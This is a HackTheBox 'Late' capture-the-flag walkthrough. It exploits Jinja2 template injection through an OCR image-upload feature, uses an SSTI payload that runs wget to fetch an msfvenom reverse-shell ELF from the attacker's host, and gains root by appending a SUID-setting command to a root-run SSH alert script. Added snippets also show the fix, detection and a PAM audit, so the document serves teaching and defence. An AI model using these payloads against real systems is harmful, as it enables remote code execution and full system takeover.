HackTheBox – Late

Hi everyone! This is a Linux machine challenge that was created on 24 April 2022. This machine requires us to use a Python web app’s Optical Character Recognition (OCR) feature for Server-Side Template Injection (SSTI), which gives us initial access. For privilege escalation, we need to enumerate files on the victim machine owned by our user and modify a script that root executes whenever someone SSHes into the machine. Let’s get started!

1. Nmap enumeration

$ IP=10.10.11.156

$ nmap -sC -sV -p- $IP
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.11 seconds

2. Web enumeration

2.1 Domain name discovery

Modify the /etc/hosts file to include the domain name.

$ sudo nano /etc/hosts

My /etc/hosts now contains the following:

127.0.0.1       localhost
127.0.1.1       kali

10.10.11.156 late.htb images.late.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

2.2 images.late.htb

2.3 Testing text-based image upload

The website tells us it will automatically parse the text in an uploaded image and return the result to us. Let’s give it a try. I created an image, testing.png, shown below, using Paint on Windows with the Calibri font at size 22, then transferred it to my Kali machine to upload.

Once uploaded, the website lets me download the result, results.txt, which indeed contains the same text as the image.

2.4 SSTI vulnerability discovery

I decided to give Server-Side Template Injection (SSTI) a try, as shown in ssti_test.png below, and it turned out to be successful.

I got back the result of 2*6.
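As an added illustration (not code from this writeup or from the Late app itself), here is the bug pattern behind the test above modelled in plain Jinja2, beside the fix and a log-side detection check. It assumes, which the page does not state, that the site is a Python/Flask app rendering the OCR text with render_template_string; the OCR output value is constructed.

```python
from jinja2 import Environment, Template

# Constructed stand-in for the text the OCR step would return for ssti_test.png.
OCR_OUTPUT = "{{2*6}}"


def render_vulnerable(ocr_text: str) -> str:
    """Bug pattern: recognised text is concatenated into the template *source*,
    so Jinja2 evaluates any {{ }} expression the uploader drew in the image."""
    return Template("Result: " + ocr_text).render()


def render_fixed(ocr_text: str) -> str:
    """Fix: the template is a constant; the text is passed as a *variable* and
    is only ever printed, so braces come back as literal characters."""
    env = Environment(autoescape=True)
    return env.from_string("Result: {{ text }}").render(text=ocr_text)


def looks_like_template_injection(text: str) -> bool:
    """Cheap detection for upload logs: flag OCR output carrying template
    delimiters so attempts like ssti_test.png show up in alerting."""
    return any(marker in text for marker in ("{{", "{%", "${"))
```

Running the same OCR text through both renderers shows the difference: the vulnerable one returns the evaluated arithmetic, the fixed one returns the braces untouched.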

2.5 Obtaining the correct font and size

Although we know we can use Method Resolution Order (MRO) to obtain a shell, I got an error when I tried to do so. I removed the curly brackets to check the recognised text and noticed that some characters, such as underscores, were missing. After a few experiments, Source Code Pro Black at font size 14, captured zoomed-in with Windows’ Snipping Tool, worked best without characters frequently being parsed incorrectly. This is actually the hardest part of this machine: getting the parsing to work. A lot of patience is needed. Keep retrying until it works.

2.6 Reverse shell

Generate the reverse shell file:

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=8080 -f elf -o rshell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: rshell.elf

We can now use the RCE to fetch our generated reverse shell file. Remember to start an HTTP server on port 80 and a netcat listener on port 8080 first.

{{request.application.__globals__.__builtins__.__import__('os').system('wget http://10.10.14.8/rshell.elf')}}

You should get a successful connection from the victim machine.

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.156 - - [07/Jul/2022 08:50:10] "GET /rshell.elf HTTP/1.1" 200 -

We can now make the file executable before running it.

Finally, our netcat listener should receive a shell.

$ nc -lvnp 8080
listening on [any] 8080 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.11.156] 49900
python -c 'import pty; pty.spawn("/bin/bash")'
svc_acc@late:/home/svc_acc/app$ 

2.7 Obtain user flag

svc_acc@late:/home/svc_acc/app$ cd ~
cd ~
svc_acc@late:/home/svc_acc$ ls
ls
app  user.txt
svc_acc@late:/home/svc_acc$ cat user.txt
cat user.txt
a7******************************
svc_acc@late:/home/svc_acc$ 

3. Privilege escalation

3.1 Discovered interesting script

svc_acc@late:/home/svc_acc$ find / -group svc_acc 2>/dev/null
...
/usr/local/sbin/ssh-alert.sh
...

svc_acc@late:/home/svc_acc$ ls -l /usr/local/sbin/ssh-alert.sh
ls -l /usr/local/sbin/ssh-alert.sh
-rwxr-xr-x 1 svc_acc svc_acc 433 Jul  7 13:43 /usr/local/sbin/ssh-alert.sh

svc_acc@late:/home/svc_acc$ cat /usr/local/sbin/ssh-alert.sh
cat /usr/local/sbin/ssh-alert.sh
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi

3.2 Test if the script will be executed as root

First, we need a tool like pspy to monitor processes. I downloaded pspy to my Kali machine from GitHub.

$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

Next, grab the SSH private key and save it as le_key.txt. Otherwise, once pspy is running in our reverse shell, we would need a second reverse shell into the machine, which is troublesome.

svc_acc@late:/home/svc_acc$ cat ~/.ssh/id_rsa
cat ~/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

We can now run pspy on the victim’s machine.

svc_acc@late:/home/svc_acc$ chmod +x pspy64

svc_acc@late:/home/svc_acc$ ./pspy64

Connect to the victim’s machine via SSH using the private key, le_key.txt.

$ chmod 600 ./le_key.txt

$ ssh svc_acc@10.10.11.156 -i ./le_key.txt
svc_acc@late:~$ 

In pspy we should see the script being executed as root (UID 0).
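Added defensive example, not from the writeup: a small audit that finds the misconfiguration this box relies on, a script that PAM hands to root at SSH login but that a non-root user owns or can write. It assumes the alert script is wired in through pam_exec.so in /etc/pam.d (the page only shows the PAM_* variables the script reads); the sample PAM line is constructed.

```python
import re
import stat
from pathlib import Path

# Constructed sample /etc/pam.d/sshd content. Assumption: the alert script is
# hooked in via pam_exec.so; the page only shows the PAM_* variables it reads.
SAMPLE_PAM_SSHD = """@include common-session
session optional pam_exec.so seteuid /usr/local/sbin/ssh-alert.sh  # alert
"""
PAM_EXEC_RE = re.compile(r"\bpam_exec\.so\b(.*)$")

def pam_exec_targets(pam_config_text: str) -> list:
    """Return the command paths on pam_exec.so lines of one pam.d file."""
    targets = []
    for raw in pam_config_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip comments
        m = PAM_EXEC_RE.search(line)
        if not m:
            continue
        # Options (seteuid, quiet, log=...) come first; the command is the
        # first absolute path after the module name.
        for tok in m.group(1).split():
            if tok.startswith("/"):
                targets.append(tok)
                break
    return targets

def script_findings(path: str, uid: int, mode: int) -> list:
    """Problems with a script root will run: non-root owner, group/world write."""
    problems = []
    if uid != 0:
        problems.append(f"{path}: owned by uid {uid}, not root")
    if mode & stat.S_IWGRP:
        problems.append(f"{path}: group-writable")
    if mode & stat.S_IWOTH:
        problems.append(f"{path}: world-writable")
    return problems

def audit_pam_dir(pamd_dir: str = "/etc/pam.d") -> list:
    """Report risky pam_exec targets across every file in a pam.d directory."""
    findings = []
    for cfg in sorted(p for p in Path(pamd_dir).glob("*") if p.is_file()):
        for target in pam_exec_targets(cfg.read_text(errors="replace")):
            try:
                st = Path(target).stat()
            except FileNotFoundError:
                findings.append(f"{target}: referenced in {cfg.name} but missing")
                continue
            findings.extend(script_findings(target, st.st_uid, st.st_mode))
    return findings
```

Run audit_pam_dir() as root on a host; the ls -l output in section 3.1 (owner svc_acc, mode 755) would produce exactly one finding, the non-root owner, which is the fix: chown the script to root.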

3.3 Obtain root shell

Since we know the script is executed as root, we can append a malicious command to the end of the script to make /bin/bash SUID.

svc_acc@late:~$ echo "chmod u+s /bin/bash" >> /usr/local/sbin/ssh-alert.sh

Attempt to SSH in again.

$ ssh svc_acc@10.10.11.156 -i ./le_key.txt

/bin/bash should now be SUID, so we can use it to obtain a root shell.

svc_acc@late:~$ bash -p
bash-4.4# id
uid=1000(svc_acc) gid=1000(svc_acc) euid=0(root) groups=1000(svc_acc)
bash-4.4#

3.4 Obtaining root flag

bash-4.4# cd /root
bash-4.4# ls
root.txt  scripts
bash-4.4# cat root.txt
f1******************************

I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
